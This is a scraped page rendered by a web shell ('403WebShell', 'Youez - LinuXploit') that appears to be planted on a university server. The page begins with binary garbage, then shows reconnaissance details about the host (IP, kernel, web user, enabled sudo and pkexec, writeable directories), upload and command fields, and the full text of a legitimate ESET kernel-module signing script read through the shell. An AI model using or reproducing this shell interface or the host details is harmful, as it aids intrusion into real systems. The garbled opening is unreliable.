h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /opt/eset/efs/lib/install_scripts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /opt/eset/efs/lib/install_scripts/sign_modules.sh
#!/bin/sh

ERTP_MODULE="eset_rtp"
SIGN_ALL_KERNELS=0
KEY_ENROLLED=0
INTERACTIVE_MODE=1

help() {
FOLD="$(which fold 2>/dev/null || true)"
if [ -n "$FOLD" ]; then
	FOLD="$FOLD -s"
	TPUT="$(which tput 2>/dev/null || true)"
	if [ -n "$TPUT" ]; then
		COLS="$(tput cols || true)"
		if [ -n "$COLS" ]; then
			FOLD="$FOLD -w $COLS"
		fi
	fi
else
	FOLD="cat"
fi

$FOLD << HELP
This is ESET Server Security 9.0.461.0 script for signing and building kernel modules.

Usage:
	$0 -h
	$0 [-d PUBKEY -p PRIVKEY] [-k KERNEL] [-a]

Without parameters, the script runs in interactive mode.

Options:
	-h, --help
		Show this help of command-line arguments
	-d, --public-key
		Set the path to the public key in DER format to use for signing
	-p, --private-key
		Set the path to the private key to use for signing
	-k, --kernel
		Set the kernel name whose kernel modules have to be signed (and built if missing).
		The current kernel is selected by default
	-a, --kernel-all
		Sign (and build) kernel modules on all existing kernels which contain headers

Kernel module transfer:
Kernel module for a specific kernel can be built and signed on one machine (which contains a private key) and then transferred to other machines with the same kernel. To do this, simply copy /lib/modules/<kernel-version>/eset/efs/$ERTP_MODULE from the build machine to the same path on the target machine.
It's essential to call "depmod <kernel-version>" and to restart ESET Server Security on the target machine to update the modules table after copying.
HELP
}

print_error() {
	echo "$1" 1>&2
}

while [ $# -gt 0 ]; do
	key="$1"
	case $key in
		-h|--help) help; exit 0;;
		-d|--public-key)
		PUB_KEY="$2"
		if ! [ -f "$PUB_KEY" ]; then
			print_error "$key has to contain a valid path to DER key!"
			exit 1
		fi
		shift 2 # past argument & value
		;;
		-p|--private-key)
		PRIV_KEY="$2"
		if ! [ -f "$PRIV_KEY" ]; then
			print_error "$key has to contain a valid path to the private key!"
			exit 1
		fi
		shift 2 # past argument & value
		;;
		-k|--kernel)
		if [ "$#" -lt 2 ]; then
			print_error "$key option requires a value"
			exit 1
		fi
		CUSTOM_KERNEL="$2"
		shift 2 # past argument & value
		;;
		-a|--kernel-all)
		SIGN_ALL_KERNELS=1
		shift # past argument
		;;
		*)    # unknown option
		print_error "Unknown option $key"
		help
		exit 1
		;;
	esac
done

# helper functions
ask_for_keys() {
	echo -n "Please enter the path to the private key, which can be used for module signing: "
	read PRIV_KEY
	if ! [ -f "$PRIV_KEY" ]; then
		print_error "Path to the private key is invalid!"
		exit 1
	fi
	echo
	echo -n "Please enter the path to the public key in DER format, which can be used for module signing: "
	read PUB_KEY
	if ! [ -f "$PUB_KEY" ]; then
		print_error "Path to the public key is invalid!"
		exit 1
	fi
}

KEYS_GENERATED=0
KEYS_DIR=
generate_keys() {
	echo -n "Do you want to generate new keys? [y/n] "
	read r
	case $r in
		[Yy]|[Yy][Ee][Ss]) ;;
		*)	print_error "Since you neither provided keys to sign the modules with nor agreed to generate keys, the modules remain unsigned, and the script closes."
			exit 1;;
	esac

	KEYS_DIR=$(mktemp -d) || exit 1
	mount -t tmpfs -o size=100k,mode=600 tmpfs "$KEYS_DIR" || exit 1
	PRIV_KEY="$KEYS_DIR/efs_mok.priv"
	PUB_KEY="$KEYS_DIR/efs_mok.der"

	OPENSSL_VERSION=$(openssl version | cut -d" " -f 2 | grep -o -E '[0-9,.]+' | tr -d '.')
	if [ "$OPENSSL_VERSION" -ge 111 ]; then
		OPENSSL_ADDITIONAL_FLAG="-addext extendedKeyUsage=codeSigning"
	fi

	if ! openssl req -new -x509 -newkey rsa:4096 -keyout "$PRIV_KEY" -outform DER -out "$PUB_KEY" -nodes -days 1825 -subj "/CN=Custom MOK for ESET Server Security/" $OPENSSL_ADDITIONAL_FLAG; then
		print_error "Cannot generate new keys. Please try it manually and then provide their path when requested by the script."
		exit 1
	fi

	chmod 600 "$PRIV_KEY"

	trap "remove_generated_keys && exit" EXIT
	KEYS_GENERATED=1
	echo "New keys have been generated."
	echo
}

build_kernel_module() {
	KERNEL_DIR="$1"
	KERNEL_VERSION=$(basename "$KERNEL_DIR")
	MODULE_TARGET_PATH="$2"
	echo "Compiling kernel module in $KERNEL_DIR"
	( \
		cd "/var/opt/eset/efs/eventd" && \
		KDIR="$KERNEL_DIR/build" make -B modules >/dev/null && \
		cp "$ERTP_MODULE/$ERTP_MODULE.ko" "$MODULE_TARGET_PATH"
		depmod $KERNEL_VERSION \
	) || (print_error "Error compiling on-access kernel module" && exit 1)
}

sign_module() {
	KERNEL_DIR="$1"
	MODULE_TO_SIGN="$2"

	if which kmodsign >/dev/null 2>&1; then
		SIGNER_UTIL="kmodsign"
	elif [ -f "$KERNEL_DIR/build/scripts/sign-file" ]; then
		SIGNER_UTIL="$KERNEL_DIR/build/scripts/sign-file"
	else
		print_error "We cannot find any script to sign the kernel module. Please sign it manually or install kmodsign or sign-file in headers/scripts."
		exit 1
	fi

	if ! $SIGNER_UTIL sha512 "$PRIV_KEY" "$PUB_KEY" "$MODULE_TO_SIGN"; then
		print_error "Kernel module $MODULE_TO_SIGN cannot be signed. Please check if $PRIV_KEY and $PUB_KEY are valid keys."
		exit 1
	fi
}

build_and_sign_kernel_module() {
	KERNEL_DIR="$1"
	if ! [ -d "$KERNEL_DIR/build" ]; then
		echo "Kernel directory $KERNEL_DIR does not contain headers, skipping..."
		return
	fi

	ESET_MODULE_DIR="$KERNEL_DIR/eset/efs"
	mkdir -p "$ESET_MODULE_DIR"
	ESET_MODULE_PATH="$ESET_MODULE_DIR/$ERTP_MODULE.ko"
	if ! [ -f "$ESET_MODULE_PATH" ]; then
		build_kernel_module "$KERNEL_DIR" "$ESET_MODULE_PATH"
	fi

	sign_module "$KERNEL_DIR" "$ESET_MODULE_PATH"

	echo "Kernel module $ESET_MODULE_PATH has been signed."
}

sign_all_kernel_modules() {
	for KERNEL_DIR in /lib/modules/*; do
		build_and_sign_kernel_module "$KERNEL_DIR"
	done
}

enroll_key() {
	echo "mokutil will ask you to set a password. Remember the password. After reboot, enter UEFI settings, select \"Enroll MOK\" and enter the password you remembered."
	echo "Note that MOK (Machine Owner Key) cannot be authorized remotely. Therefore you have to have physical access to the machine to update UEFI settings."
	mokutil --import "$PUB_KEY" || exit 1
	KEY_ENROLLED=1
}

save_keys() {
	echo "Please provide the path to the directory where you want the generated keys to be copied. Keys should be secured and not accessible for processes or other users. ESET Server Security does not store them and will remove its copy at the end of this script."
	echo -n "Directory to store keys: "
	read directory
	if ! [ -d "$directory" ]; then
		print_error "Not a directory!"
		save_keys
	elif ! cp "$PUB_KEY" "$PRIV_KEY" "$directory"; then
		print_error "Error during cp. Please check the permissions."
		save_keys
	fi
}

remove_generated_keys() {
	umount -f "$KEYS_DIR"
	rm -rf "$KEYS_DIR"
}

restart_product() {
	systemctl restart efs >/dev/null
}

# main
if [ "$(id -u)" -ne 0 ]; then
	print_error "ERROR: This script must be run as root."
	exit 1
fi

if [ -z "$PUB_KEY" ] || [ -z "$PRIV_KEY" ]; then
	echo -n "Private & public key has not been given via arguments. Do you want to provide them? (recommended to provide already enrolled keys) [y/n] "
	read r
	case $r in
		[Yy]|[Yy][Ee][Ss]) ask_for_keys;;
		*) generate_keys;;
	esac
else
	INTERACTIVE_MODE=0
fi

if [ "$SIGN_ALL_KERNELS" -eq 1 ]; then
	sign_all_kernel_modules
elif [ -n "$CUSTOM_KERNEL" ]; then
	build_and_sign_kernel_module "/lib/modules/$CUSTOM_KERNEL"
else
	build_and_sign_kernel_module "/lib/modules/$(uname -r)"
fi

if [ "$INTERACTIVE_MODE" -eq 0 ]; then
	restart_product
	exit
fi

if mokutil --test-key "$PUB_KEY" >/dev/null; then
	echo
	echo -n "Public key $PUB_KEY is not imported in UEFI. Do you want to enroll it now? [y/n] "
	read r
	case $r in
		[Yy]|[Yy][Ee][Ss]) enroll_key;;
		*)	echo "Please enroll it at UEFI manually using \"mokutil --import /path/to/key.der\", and approve upon system reboot. Otherwise, our kernel module cannot load."
			;;
	esac
	echo
else
	echo "Restarting ESET Server Security to use the new signed kernel module..."
	restart_product
	exit
fi

if [ "$KEYS_GENERATED" -eq "1" ]; then
	if [ "$KEY_ENROLLED" -eq "0" ]; then
		save_keys
	else
		echo -n "Do you want to save the generated keys? [y/n] "
		read r
		case $r in
			[Yy]|[Yy][Ee][Ss]) save_keys;;
			*)	;;
		esac
	fi
fi

if [ "$KEY_ENROLLED" -eq "1" ]; then
	echo -n "Do you want to reboot the system and approve the new MOK (Machine Owner Key) in UEFI? (recommended) [y/n] "
	read -r r
	case $r in
		[Yy]|[Yy][Ee][Ss]) reboot;;
		*) echo "Please do that manually.";;
	esac
fi

Youez - 2016 - github.com/yon3zu
LinuXploit